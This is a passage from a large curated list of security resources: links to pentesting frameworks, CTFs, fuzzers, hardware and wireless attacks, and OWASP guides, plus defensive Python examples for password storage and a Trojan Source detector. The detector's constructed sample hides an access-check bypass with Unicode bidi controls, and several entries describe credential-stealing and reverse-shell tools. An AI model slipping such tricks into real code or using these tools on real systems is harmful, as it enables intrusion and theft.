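    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_headers(hdrs) or "baseline met")
```

Feed it the header dict from any HTTP client; the findings are the same items the hardening guides above walk through one by one.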

CSIRT / Secure Programming / Web Training

OWASP Broken Web Applications Project (repository)
dvna 705 8 months ago : Damn Vulnerable NodeJS Application
VulnLab 385 4 months ago : A web vulnerability lab project developed by Yavuzlar

CSIRT / Secure Programming / SAST

Static analysis powered security scanner for your terraform code 6,718 about 2 months ago
Scan (skæn) : a free open-source security audit tool for modern DevOps teams; a free and open-source DevSecOps platform
Coccinelle : is a program matching and transformation engine which provides the language SmPL (Semantic Patch Language) for specifying desired matches and transformations in C code
brakeman 7,015 9 days ago : A static analysis security vulnerability scanner for Ruby on Rails applications
How disable comments make static analysis tools worse
A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
Potential remote code execution in PyPI
What's New with SAST + DAST
DevSecOps with DAST and Security Hub
Sonarqube Community Branch Plugin 2,251 5 days ago : A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube
SAST Analyzers
Pip-audit : Google-backed tool probes Python environments for vulnerable packages
trivy 23,679 8 days ago : Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues
Horusec
Source Code Analysis Tools
COVERITY SCAN
Trojan Source : Invisible Source Code Vulnerabilities
Warn users when a PR contains some characters : Unicode bi-directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired
ikos 2,292 about 2 months ago : Static analyzer for C/C++ based on the theory of Abstract Interpretation
A Guide On Implementing An Effective SAST Workflow
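The Trojan Source paper and the PR-warning entry above rest on one observation: Unicode bidirectional controls (RLO, LRI, PDI and friends) and zero-width characters change what a reviewer sees without changing what the compiler parses. The scanner below is an added example written for this list, not the paper's or GitHub's code; it reports every such code point with line and column and, as the stronger signal, any line whose embedding or isolate is never closed. The sample source is constructed in the style of the paper's early-return example, not copied from it.

```python
"""Added example: find Trojan Source bidi controls and invisible characters
in source text (not the paper's or GitHub's code). SAMPLE_SOURCE is constructed."""
import sys

BIDI_CONTROLS = {
    "\u202A": "LRE", "\u202B": "RLE", "\u202D": "LRO", "\u202E": "RLO",   # embeddings / overrides
    "\u202C": "PDF",                                                      # closes the four above
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",                     # isolates
    "\u2069": "PDI",                                                      # closes the three above
}
INVISIBLES = {
    "\u200B": "ZWSP", "\u200C": "ZWNJ", "\u200D": "ZWJ", "\u2060": "WJ",
    "\u00AD": "SHY", "\uFEFF": "ZWNBSP/BOM",
}
EMBED_OPENERS = set("\u202A\u202B\u202D\u202E")
ISOLATE_OPENERS = set("\u2066\u2067\u2068")


def find_suspicious_chars(text: str):
    """Return (line, column, 'U+XXXX', name) for every watched code point."""
    watch = {**BIDI_CONTROLS, **INVISIBLES}
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in watch:
                hits.append((lineno, col, f"U+{ord(ch):04X}", watch[ch]))
    return hits


def unterminated_bidi_lines(text: str):
    """Lines whose embeddings/isolates are not closed on the same line.

    Trojan Source payloads rely on an override that runs to the end of the
    comment or string literal, so an opener without its PDF/PDI on the same
    line is the strongest signal; legitimate right-to-left text in a string
    normally closes what it opens."""
    bad = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        embeds = sum(ch in EMBED_OPENERS for ch in line) - line.count("\u202C")
        isolates = sum(ch in ISOLATE_OPENERS for ch in line) - line.count("\u2069")
        if embeds != 0 or isolates != 0:
            bad.append(lineno)
    return bad


# Constructed sample: line 2 renders like a harmless comment, but in logical
# order the string literal closes early; line 4 hides a zero-width space in a name.
SAMPLE_SOURCE = (
    "def check_access(access_level):\n"
    "    if access_level != 'user\u202E \u2066# Check if admin\u2069 \u2066':\n"
    "        return True\n"
    "    admin\u200B = False\n"
    "    return False\n"
)

if __name__ == "__main__":
    sources = {p: open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]}
    for name, text in (sources or {"<sample>": SAMPLE_SOURCE}).items():
        for lineno, col, cp, label in find_suspicious_chars(text):
            print(f"{name}:{lineno}:{col}: {cp} ({label})")
        for lineno in unterminated_bidi_lines(text):
            print(f"{name}:{lineno}: bidi control not terminated on this line")
```

Run it over the files in a pull request (`python scan.py $(git diff --name-only main)`) and fail the check on any hit; projects that ship legitimate RTL strings can whitelist files and still fail on unterminated controls.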

CSIRT / Secure Programming / Secure Web dev / OWASP:

Introduction to OWASP Top 10 2021
OWASP Web Security Testing Guide 7,338 27 days ago : The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services
OWASP-Testing-Checklist 1,506 almost 2 years ago
OWASP-Web-Checklist 1,747 over 2 years ago : OWASP Web Application Security Testing Checklist
Projects/OWASP Node js Goat Project ,
DependencyCheck 6,441 7 days ago : OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies
OWASP Risk Assessment Calculator
OWASP Top 10 Proactive Controls 2018
OWASP API Security Project
Exploiting OWASP Top 10 API Vulnerabilities
vAPI 1,177 over 1 year ago is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises

CSIRT / Secure Programming / Secure Web dev / OWASP: / CheatSheets:

CheatSheetSeries 28,160 4 days ago : The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics
Password Storage Cheat Sheet
Database Security Cheat Sheet
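The Password Storage Cheat Sheet listed above (and "How to Process Passwords as a Software Developer" in the Secure Programming section) come down to four decisions: a memory-hard KDF, a random per-user salt, a stored form that records its own parameters so they can be raised later, and a constant-time comparison. The code below is an added example, not OWASP's or the article's; it uses scrypt from the standard library because Argon2id needs a third-party package, and the `$scrypt$ln=..,r=..,p=..$salt$hash` layout and the cost parameters are assumptions chosen for illustration (16 MiB per hash, within what the cheat sheet's parameter table allows).

```python
"""Added example: password storage with scrypt, per-user salt, self-describing
record and constant-time verification (not OWASP code). The record layout
and cost parameters are assumptions for illustration."""
import base64
import hashlib
import hmac
import os

# Cost: N = 2^14, r = 8 uses 2^14 * 8 * 128 bytes = 16 MiB per hash; p = 5
# trades memory for CPU. Raise these over time and let needs_rehash() migrate.
SCRYPT_LN, SCRYPT_R, SCRYPT_P = 14, 8, 5
SALT_BYTES, KEY_BYTES = 16, 32


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def hash_password(password: str, salt: bytes = None) -> str:
    """Return the stored form for `password`; a fresh salt every call."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=1 << SCRYPT_LN, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_BYTES)
    return f"$scrypt$ln={SCRYPT_LN},r={SCRYPT_R},p={SCRYPT_P}${_b64(salt)}${_b64(key)}"


def _parse(stored: str):
    """Split the stored form; raises ValueError on anything unexpected."""
    empty, algo, params, salt_b64, key_b64 = stored.split("$")
    if empty or algo != "scrypt":
        raise ValueError("unsupported hash format")
    p = dict(kv.split("=", 1) for kv in params.split(","))
    return (int(p["ln"]), int(p["r"]), int(p["p"]),
            base64.b64decode(salt_b64), base64.b64decode(key_b64))


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the parameters recorded in `stored` and compare in
    constant time. Any malformed record is a plain False, never an exception
    that tells an attacker which part was wrong."""
    try:
        ln, r, p, salt, expected = _parse(stored)
        candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                                   n=1 << ln, r=r, p=p, dklen=len(expected))
    except (ValueError, KeyError):
        return False
    return hmac.compare_digest(candidate, expected)


def needs_rehash(stored: str) -> bool:
    """True when the record uses weaker-than-current parameters (or an
    unknown format); call after a successful login and store hash_password()."""
    try:
        ln, r, p, _, _ = _parse(stored)
    except (ValueError, KeyError):
        return True
    return ln < SCRYPT_LN or r < SCRYPT_R or p < SCRYPT_P


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("right password:", verify_password("correct horse battery staple", record))
    print("wrong password:", verify_password("Tr0ub4dor&3", record))
    print("needs rehash:", needs_rehash(record))
```

Because the parameters live in the record, raising `SCRYPT_LN` later does not invalidate existing logins: old records still verify with their own cost, and `needs_rehash` flags them for transparent upgrade at the next successful login.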

CSIRT / Secure Programming / Secure Web dev / OWASP:

OWASP Cornucopia

CSIRT / Secure Programming / Secure Web dev

The 2021 CWE Most Important Hardware Weaknesses
secDevLabs 901 about 2 months ago : A laboratory for learning secure web development in a practical manner
Secure Modular Runtimes
WebSecurity Academy
Prototype pollution – and bypassing client-side HTML sanitizers
Understanding the CSRF Vulnerability (A Beginner’s Guide)
VulnyCode 398 over 2 years ago : PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex
PwnMachine 302 4 months ago : PwnMachine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters
WebSploit Labs : is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions
Introduction - OWASP Cheat Sheet Series
Stop Password Masking : Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures
Forgot password? Taking over user accounts Kaminsky style
CWE Top 25 Most Dangerous Software Weaknesses
Datashare Server Mode 597 8 days ago
GitLab analysis of OWASP Top 10 changes from 2004 to 2021
oxAuth 424 about 1 month ago : OAuth 2.0 server and client; OpenID Connect Provider (OP) & UMA Authorization Server (AS)
Prototype Pollution in Python

CSIRT / Secure Programming / Formal Analysis

A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs
SCYTHE's Community Threats Repository : Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here

CSIRT / Secure Programming / Fuzzing

Generating Software Tests
afl-unicorn : Fuzzing Arbitrary Binary Code
Regaxor 43 over 6 years ago : A regular expression fuzzer
BrokenType 430 about 5 years ago : TrueType and OpenType font fuzzing toolset
Dizzy-legacy 34 over 7 years ago : Network and USB protocol fuzzing toolkit
Start-Hollow.ps1 2,613 about 3 years ago : My musings with PowerShell
auditd-attack 778 over 4 years ago : A Linux Auditd rule set mapped to MITRE's Attack Framework
BFuzz 309 almost 2 years ago : Fuzzing Browsers
Structure-Aware Fuzzing with libFuzzer 1,431 about 3 years ago
Fuzzilli 1,890 7 days ago : A JavaScript Engine Fuzzer
Materials from Fuzzing Bay Area meetups 68 almost 5 years ago
javafuzz 228 over 3 years ago : Javafuzz is coverage-guided fuzzer for testing Java packages
onefuzz 2,821 about 1 year ago : A self-hosted Fuzzing-As-A-Service platform
Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
ffuf 12,704 5 months ago : Fast web fuzzer written in Go
rFuss2 23 over 3 years ago : Simple rust fuzzer
RESTler : the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. Also linked: source code for a self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows
Jackalope 1,094 2 months ago : Binary, coverage-guided fuzzer for Windows and macOS
Dynamic Program Analysis by Dmitry Vyukov
Fuzzing the Linux Kernel by Andrey Konovalov
Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
AFLplusplus 5,202 7 days ago : The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
sandsifter 485 about 6 years ago : The x86 processor fuzzer
Fuzzing-101 3,222 6 months ago : Do you want to learn how to fuzz like a real expert, but don't know how to start?
The Challenges of Fuzzing 5G Protocols
Fuzzing Workshops
AFLNet 872 4 months ago : A Greybox Fuzzer for Network Protocols
ClusterFuzz : is a scalable fuzzing infrastructure that finds security and stability issues in software
Introduction to VirtualBox security research

CSIRT / Secure Programming / API

The Web API Checklist : 43 Things To Think About When Designing, Testing, and Releasing your API
API-Security-Checklist 22,480 7 days ago : Checklist of the most important security countermeasures when designing, testing, and releasing your API
REST API Checklist
Your Comprehensive Web API Design Checklist
API Security Testing : Rules And Checklist

CSIRT / Secure Programming / API / API Security Testing

Part 1 of 3
Part 2 of 3
Part 3 of 3

CSIRT / Secure Programming / API

Istio 36,086 5 days ago : An open platform to connect, manage, and secure microservices
How to contact Google SRE: Dropping a shell in cloud SQL
hack-requests 466 over 1 year ago : The hack-requests is an http network library for hackers
Free API and Microservice Books
MindAPI 823 about 2 months ago : Organize your API security assessment by using MindAPI. It's free and open for community collaboration
OWASP API Security Project
Here you can find a variety of resources to help you out on the API security path.
Introducing vAPI – an open source lab environment to learn about API security
REST API Testing Tutorial : Sample Manual Test Case
REST Security Cheat Sheet 28,160 4 days ago : CheatSheetSeries
Penetration Testing RESTful Web Services
RESTful web services penetration testing
Astra : Automated Security Testing for REST APIs
bad_json_parsers 366 almost 2 years ago : Exposing problems in json parsers of several programming languages

CSIRT / CTFs / CTFd:

Deploying CTFd
CTFd Tips

CSIRT / CTFs

Mellivora 441 11 months ago is a CTF engine written in PHP
Boss of the SOC (BOTS) Dataset Version 3 290 over 4 years ago
SA-ctf_scoreboard 118 almost 3 years ago
The fast, easy, and affordable way to train your hacking skills.
Write-ups for crackmes and CTF challenges 49 almost 2 years ago by eleemosynator
pwntools 12,117 21 days ago : CTF framework and exploit development library
google-ctf 4,529 9 days ago
Pwn2Win 2018
Leap Security
35c3ctf-challs 88 almost 6 years ago
ctf-tasks 608 almost 3 years ago : An archive of low-level CTF challenges developed over the years
$50 million CTF Writeup 586 over 5 years ago
Alice sent Bob a meme UTCTF 2019. tl;dr: Extract data from given images using binwalk, transform the given diophantine equation into a cubic curve and retrieve EC parameters, solve the ECDLP given in the extracted data using the Pohlig-Hellman algorithm
RsaCtfTool 5,743 8 days ago : RSA attack tool (mainly for ctf) - retrieve private key from weak public key and/or uncipher data
RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
BalsnCTF-2019 33 over 1 year ago by CykuTW
HackTheBox CTF Cheatsheet 1,544 over 1 year ago : This cheatsheet is aimed at CTF players and beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty
Mumbai:1 Vulnhub Walkthrough
0x0G 2020 CTF
FIRST SecLounge CTF 2020 Solutions
Hitcon2017CTF - 家徒四壁Everlasting Imaginative Void
r2dec
SASatHome
Crypton 1,491 over 3 years ago : Library consisting of explanation and implementation of all the existing attacks on various Encryption Systems, Digital Signatures, Key Exchange, Authentication methods along with example challenges from CTFs
Bash injection without letters or numbers - 33c3ctf hohoho
Writeup CTF - Web API Exploitation
Closing Capture the Flag Session & Winning Team Presentation
attack & defense CTF demo 15 over 6 years ago
ctftool 1,641 about 3 years ago : Interactive CTF Exploration Tool
CTF-Writeups 15 over 2 years ago : writeups for Capture The Flag Competitions
Capture the Flag
DEF CON CTF 2021 QUALS and ,
eDump
HITB SECCCONF EDU CTF 2021 19 about 3 years ago : Developed by Hackerdom team and HITB
Planilhas Baby Latinoware CTF 2021
CTF KAVACON 21 – LUZ ROJA, LUZ VERDE
RET2 WarGames
CTF: Learn "hacking" by playing (es)
HackLab #1 (es)
Penetration testing laboratories "Test lab" emulate the IT infrastructure of real companies and are created for legal pen testing and improving penetration testing skills
Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle

CSIRT / CTFs / CTFs tools

CTFs-Exploits 1 about 2 years ago
nc-chat-ctf 4 over 7 years ago : Chat Server for CTF Players wrapped in SSL
thg-framework 8 almost 2 years ago
Super-Guesser-ctf 109 over 2 years ago
Ciphr 115 over 6 years ago : CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses
sec-tools 650 over 3 years ago : A set of security related tools
Real World CTF 2023 : Solving a Java CTF challenge by writing static analysis passes!

CSIRT / Phreak

ss7MAPer
Into the wild: Gaining access to SS7 - Part 1: Finding an access point
SCTP/SIGTRAN & SS7 Overview
Security Penetration Test Framework for the Diameter Protocol
Signaling Security in LTE Roaming
Phrack

CSIRT / Archs

LAB ENVIRONMENT ARM
HUB Azure IoT
A collection of vulnerable ARM binaries for practicing exploit development 898 about 3 years ago
arm vm working out of the box for everyone 867 about 2 years ago
Statically compiled ARM binaries for debugging and runtime analysis. 462 over 3 years ago
Hacker Finds Hidden 'God Mode' on Old x86 CPUs : Hardware backdoors in some x86 CPUs
USBHarpoon Is a BadUSB Attack with A Twist
Patching Binaries with Radare2 - ARM64 Ground Zero: Part 3-2
A 2018 practical guide to hacking RFID/NFC
riscv-ida 29 about 4 years ago : RISC-V ISA processor module for IDAPro 7.x
mac-age 577 5 days ago : MAC address age tracking
Lexra : Lexra implemented a 32-bit variant of the MIPS architecture
IntelTEX-PoC 509 over 4 years ago : Intel Management Engine JTAG Proof of Concept
me_cleaner 4,505 6 months ago : Tool for partial deblobbing of Intel ME/TXE firmware images
Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
IDA-scripts 93 over 5 years ago : IDAPro scripts/plugins
Something about IR optimization : Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself
Dragonblood : Analysing WPA3's Dragonfly Handshake
The Hacker's Hardware Toolkit 2,078 about 4 years ago : The best hacker's gadgets for Red Team pentesters and security researchers
Unfixable Seed Extraction on Trezor : A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around $100
Extracting seed from Ellipal wallet
Breaking Trezor One with Side Channel Attacks : A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes
Rewriting Functions in Compiled Binaries
Deep Dive : Machine Check Error Avoidance on Page Size Change
Saleae : Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits
wacker 295 over 1 year ago : A WPA3 dictionary cracker
Osiris
One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization

CSIRT / Archs / Hardware

Wifi-Ducky-ESPUSB 7 about 4 years ago
USB Attacks: Past, Present and Future - P4wnP1 is listed below in the pentesting section
PLATYPUS : With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs
VoltPillager : Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I 30 about 4 years ago
ToorCon 14 Badge , and
HammerKit 78 over 3 years ago : HammerKit is an open-source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms
Evil Logitech erm I ment USB cable
Hacker's guide to deep-learning side-channel attacks: the theory : Side Channel Attacks Assisted with Machine Learning
Guarding Against Physical Attacks: The Xbox One Story
Common BMC vulnerabilities and how to avoid repeating them

CSIRT / Archs / Hardware / Bluetooth:

BLEAH 1,097 almost 6 years ago : A BLE scanner for "smart" devices hacking
BrakTooth : Causing Havoc on Bluetooth Link Manager
Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
The Practical Guide to Hacking Bluetooth Low Energy
A Practical Guide to BLE Throughput
Exploiting IoT enabled BLE smart bulb security

CSIRT / Archs / Hardware / Wireless / Wifi:

ESP8266 Deauther Version 2 13,512 3 months ago : Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!
Airspy-Utils 13 about 1 year ago : is a small software collection to help with firmware related operations on Airspy HF+ devices
infernal-twin 1,236 about 2 years ago : wireless hacking - This is an automated wireless hacking tool
Cracking WiFi at Scale with One Simple Trick
hcxdumptool 1,837 11 days ago : small tool to capture packets from wlan devices

CSIRT / Archs / Hardware / Drone:

SkyJack is a drone engineered to autonomously seek out, hack, and wirelessly take over other drones within wifi distance, creating an army of zombie drones under your control
eaphammer 2,194 2 months ago : Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks
whereami 5,118 12 months ago : Uses WiFi signals and machine learning to predict where you are

CSIRT / Archs / Hardware / Car Hacking:

Car hijacking swapping a single bit
Hacking a VW Golf Power Steering ECU Part 1, and

CSIRT / Archs / Hardware / Internet of Things (IoT):

BMC-Tools 479 12 months ago : RDP Bitmap Cache parser
Hacking Printers Wiki
Full key extraction of NVIDIA™ TSEC

CSIRT / Archs / Hardware

The x86 architecture is the weirdo, part 2
awesome flipper 18,960 about 2 months ago : 🐬 A collection of awesome resources for the Flipper Zero device
Dark Flipper 17,564 11 days ago : Flipper Zero Unleashed Firmware
My Flipper Shits 1,170 24 days ago : Free and libre source BadUSB payloads for Flipper Zero. [Windows, GNU/Linux, iOS]
Reverse Engineering Yaesu FT-70D Firmware Encryption
Reverse-engineering an airspeed/Mach indicator from 1977
Stepping Insyde System Management Mode : Intel’s Alder Lake BIOS source code was

CSIRT / Archs / ARM / Arm Heap Exploitation, by Azeria:

AZM Online Arm Assembler
Understanding the Glibc Heap Implementation Part 1
Understanding the GLIBC Heap Implementation Part 2
Heap Exploit Development – Case study from an in-the-wild iOS 0-day

CSIRT / Archs / ARM

ARM64 Reversing and Exploitation by :

CSIRT / Archs / ARM / ARM64 Reversing and Exploitation

ARM Instruction Set + Simple Heap Overflow Part 1
Use After Free Part 2
A Simple ROP Chain Part 3

CSIRT / Pentesting

Awesome Penetration Testing 21,934 28 days ago : A collection of awesome penetration testing resources, tools and other shiny things
Seclists 58,517 7 days ago is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place
osquery : Search operating systems on the network
osquery Across the Enterprise
fleet 3,118 6 days ago : The premier osquery
Intrusion Detection Penetration Testing Cheat Sheet For Windows Machine

CSIRT / Pentesting / Zero Day Zen Garden:

Part 0 Windows Exploit Development
Part 1 Windows Exploit Development
Part 2 Windows Exploit Development
Part 3 Windows Exploit Development
Part 4 Windows Exploit Development

CSIRT / Pentesting

Got Meterpreter? PivotPowPY!
Pentest Tips and Tricks
Script to steal passwords from ssh. 477 almost 6 years ago
Network Infrastructure Penetration Testing Tool 1,618 over 3 years ago
tcp connection hijacker 463 23 days ago
"EAST" PENTEST FRAMEWORK
Pown.js 259 over 1 year ago : is a security testing and exploitation framework built on top of Node.js and NPM
Sandmap 1,578 almost 2 years ago is a tool supporting network and system reconnaissance using the massive Nmap engine
trackerjacker 2,636 10 months ago : Like nmap for mapping wifi networks you're not connected to, plus device tracking
TIDoS-Framework 1,782 over 1 year ago : The offensive web application penetration testing framework
GitMiner 2,092 about 4 years ago : Tool for advanced mining for content on Github
DHCPwn 667 over 6 years ago : All your IPs are belong to us
badKarma 418 almost 6 years ago : advanced network reconnaissance toolkit
Danger-zone 674 over 4 years ago : Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files
go-tomcat-mgmt-scanner 28 almost 5 years ago : A simple scanner to find and brute force tomcat manager logins
IoTSecurity101 2,726 about 1 month ago : From IoT Pentesting to IoT Security
IoT Pentesting : A virtual environment for pentesting IoT devices
red_team_telemetry 98 almost 6 years ago
SharpSploitConsole 178 almost 3 years ago : SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit
CrackMapExec 8,453 12 months ago : A swiss army knife for pentesting networks
DarkSpiritz : A penetration testing framework for Linux, MacOS, and Windows systems
proxycannon-ng 610 almost 2 years ago : A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
PentestHardware 492 over 5 years ago : Kinda useful notes collated together publicly
MarkBaggett’s gists : This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation
Serverless Toolkit for Pentesters
pentest_scripts 137 about 5 years ago : scrapes LinkedIn and generates an email list
Penetration Testing Tools Cheat Sheet : Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test
IVRE : Network recon framework
DomainInformation 0 almost 6 years ago (pt-br) : Tool for identifying files, folders, DNS servers and e-mail. It tries a zone transfer, searches for subdomains and finally looks for open ports on each IP of the subdomains. Enjoy =)
Spawning a TTY Shell : Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system
LeakLooker : Find Open Databases in Seconds
pown-recon 421 about 2 years ago : A powerful target reconnaissance framework powered by graph theory
Micro8 18,046 over 3 years ago : The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-testing, network security enthusiasts, and enterprise security protection and improvement; the series is free, shared and open source
Payloads All The Things 61,337 9 days ago : A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
Penetration Test Guide based on the OWASP + Extra 2,478 over 2 years ago : This guide is for penetration testers seeking the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which is also useful for the report document. I've also added 15 extra Test Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty

CSIRT / Pentesting / Penetration Test Guide based on the OWASP + Extra

Insecure Direct Object References 2,478 over 2 years ago (OTG-AUTHZ-004)

CSIRT / Pentesting

OWASP ZAP w2019-10-14 released : pentesting tool for finding vulnerabilities in web applications
Order of the Overflow Proxy Service 13 over 5 years ago
liffy 789 over 1 year ago : Local file inclusion exploitation tool
foxyproxy.json : Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
pentest_compilation 1,324 almost 2 years ago : Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios
Linux for Pentester : ZIP Privilege Escalation
Presentation Clickers 96 about 5 years ago : Keystroke injection vulnerabilities in wireless presentation clickers
postwoman 65,598 4 days ago : alien API request builder - A free, fast, and beautiful alternative to Postman

CSIRT / Pentesting / Better API Penetration Testing with Postman:

Part 1
Part 2
Part 3
Part 4

CSIRT / Pentesting

DNS and DHCP Recon using Powershell
SiteBroker 417 6 months ago : A cross-platform python based utility for information gathering and penetration testing automation!
PENTESTING-BIBLE 12,914 over 1 year ago : This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files. Learn Ethical Hacking and penetration testing. Hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources
Nikto 8,623 6 days ago : web server scanner
Nikto: A Practical Website Vulnerability Scanner
NetAss2
CSS Injection Primitives
physical-docs 472 about 5 years ago : This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments
pentest-tools 3,152 over 1 year ago : Custom pentesting tools
HACKING WITH ENVIRONMENT VARIABLES : Interesting environment variables to supply to scripting language interpreters
rootend 146 about 3 years ago : A *nix Enumerator & Auto Privilege Escalation tool
DroneSploit 1,443 about 1 year ago : Drone pentesting framework console
HackTricks : Here you will find the typical flow that you should follow when pentesting one or more machines
Huawei_Thief 26 about 4 years ago : Huawei DG8045 & HG633 Devices Exploitation Tool
urldozer 29 over 4 years ago : Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s])
Pentesting Cheatsheets
Snaffler 2,133 20 days ago : a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )
Several ways to download and execute malicious codes (LOLBAS)

CSIRT / Pentesting / Several ways to download and execute malicious codes (LOLBAS)

coregen.exe

CSIRT / Pentesting

Jok3r 1,030 6 months ago : Network and Web Pentest Automation Framework
Penetration Testing Cheat Sheet 660 4 days ago
BBT 1,720 8 months ago Bug Bounty Tools
P4wnP1 A.L.O.A. 3,775 about 1 year ago by MaMe82 is a framework which turns a Raspberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance"
AriaCloud 133 over 3 years ago : A Docker container for remote penetration testing
RustScan 14,669 10 days ago : The Modern Day Port Scanner
Impacket 13,551 29 days ago : is a collection of Python classes for working with network protocols
fiddler : Capturing web traffic logs
SecLists 58,517 7 days ago : is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more
21 - Pentesting FTP
PwnWiki.io is a collection of TTPs (tools, tactics, and procedures) for what to do after access has been gained
post-exploitation 1,554 over 4 years ago : Post Exploitation Collection
Proxyjump, the SSH option you probably never heard of
GLORP 249 2 months ago : A CLI-based HTTP intercept and replay proxy
Sec4US's cheatsheets : a lot about shellcoding and buffer overflows
Pentesting 101: Working With Exploits
SMB AutoRelay 47 almost 4 years ago : SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments
Decoder++ 101 8 months ago : An extensible application for penetration testers and software developers to decode/encode data into various formats
SCShell 1,400 over 1 year ago : Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
bulwark 180 4 days ago : An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports
A Noob Guide to setup your Own OOB DNS Server : A Bind9 server for pentesters to use for Out-of-Band vulnerabilities
Interactsh 3,445 4 days ago : An OOB interaction gathering server and client library
DNSLOG 4 almost 5 years ago : dnslog dns / dns rebinding platform
Pre-engagement
pentest, should I do it?
White Box Penetration Testing: “Cheating” in order to boost impact and value
Weird Proxies 1,780 about 1 year ago : Reverse proxies cheatsheet
Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal.
pwncat 1,793 about 2 years ago : netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and it's fully scriptable with Python (PSE)
From Python to .Net
offensiveph 329 about 3 years ago : use old Process Hacker driver to bypass several user-mode access controls
Penetration Testing - An Introduction by cirl.lu
